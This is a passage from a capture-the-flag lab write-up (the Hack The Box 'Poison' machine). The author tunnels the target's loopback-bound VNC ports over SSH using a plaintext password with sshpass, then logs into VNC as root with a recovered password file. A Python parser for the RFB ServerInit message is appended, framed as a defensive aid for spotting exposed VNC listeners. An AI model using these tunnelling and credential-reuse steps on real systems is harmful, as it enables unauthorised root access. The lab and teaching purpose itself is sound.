VNC
I discovered that the target system is hosting a VNC server over HTTP on the loopback address. In order to access the VNC server, I would need to tunnel it.
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ sshpass -p 'charix!2#4%6&8(0' ssh -L 5801:127.0.0.1:5801 -N -f charix@$IP
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ sshpass -p 'charix!2#4%6&8(0' ssh -L 5901:127.0.0.1:5901 -N -f charix@$IP
Since SSH is available, I will use it to tunnel both ports 5801 and 5901 of the target loopback to Kali (local forwarding with -L, running in the background with -N -f).
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 100817/ssh
tcp 0 0 127.0.0.1:5801 0.0.0.0:* LISTEN 100593/ssh
Those VNC servers running on the target loopback are now available on Kali via SSH Tunneling
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/poison]
└─$ vncviewer -passwd secret 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
desktop name "root's x desktop (poison:1)"
vnc server default format:
32 bits per pixel.
Least significant byte first in each pixel.
true colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
using default colormap which is truecolor. pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
true colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
same machine: preferring raw encoding
VNC can take a password file as an authentication method. The secret file extracted from the archive turns out to be the password file for the VNC server.
A TightVNC client window is open: I am the root user.
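The vncviewer output above is a rendering of the RFB ServerInit message the server sends once authentication succeeds. The following added example (my own code, not part of this writeup) decodes that message so a defender scanning for exposed or forwarded VNC listeners can record the pixel format and, in particular, the session owner leaked by the conventional "user's X desktop (host:display)" name; the ServerInit bytes are constructed inline to match the session shown.

```python
import re
import struct

# RFB 3.8 wire structures (network byte order). PIXEL_FORMAT is 16 bytes:
# bpp, depth, big-endian flag, true-colour flag, red/green/blue max (U16),
# red/green/blue shift (U8), then 3 bytes of padding.
PIXEL_FORMAT = struct.Struct(">BBBBHHHBBB3x")
SERVER_INIT_HEAD = struct.Struct(">HH16sI")  # width, height, pixel format, name length
DESKTOP_NAME = re.compile(
    r"^(?P<user>.+?)'s (?:x|X) desktop \((?P<host>[^:()]+):(?P<display>\d+)\)$")


def parse_version(banner: bytes) -> tuple:
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n' -> (3, 8)."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or not banner.endswith(b"\n"):
        raise ValueError("not an RFB ProtocolVersion message")
    major, minor = banner[4:11].split(b".")
    return int(major), int(minor)


def parse_server_init(msg: bytes) -> dict:
    """Decode ServerInit into the fields vncviewer prints after authentication."""
    if len(msg) < SERVER_INIT_HEAD.size:
        raise ValueError("ServerInit too short")
    width, height, pf, name_len = SERVER_INIT_HEAD.unpack_from(msg)
    name = msg[SERVER_INIT_HEAD.size:SERVER_INIT_HEAD.size + name_len]
    if len(name) != name_len:
        raise ValueError("ServerInit truncated: desktop name incomplete")
    bpp, depth, big_endian, true_colour, rmax, gmax, bmax, rsh, gsh, bsh = PIXEL_FORMAT.unpack(pf)
    info = {
        "width": width, "height": height, "bits_per_pixel": bpp, "depth": depth,
        "byte_order": "big-endian" if big_endian else "least significant byte first",
        "true_colour": bool(true_colour),
        "max": (rmax, gmax, bmax), "shift": (rsh, gsh, bsh),
        "desktop_name": name.decode("latin-1"),
        "owner": None, "host": None, "display": None,
    }
    m = DESKTOP_NAME.match(info["desktop_name"])
    if m:  # the default X desktop name reveals which account owns the session
        info.update(owner=m["user"], host=m["host"], display=int(m["display"]))
    return info


def build_server_init(width: int, height: int, name: str) -> bytes:
    """Constructed ServerInit using the pixel format seen above (32 bpp, LSB first, true colour)."""
    pf = PIXEL_FORMAT.pack(32, 24, 0, 1, 255, 255, 255, 16, 8, 0)
    return SERVER_INIT_HEAD.pack(width, height, pf, len(name)) + name.encode("latin-1")


# Constructed sample mirroring the session above; the geometry is assumed.
SAMPLE_INIT = build_server_init(1024, 768, "root's x desktop (poison:1)")
```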
System Level Compromise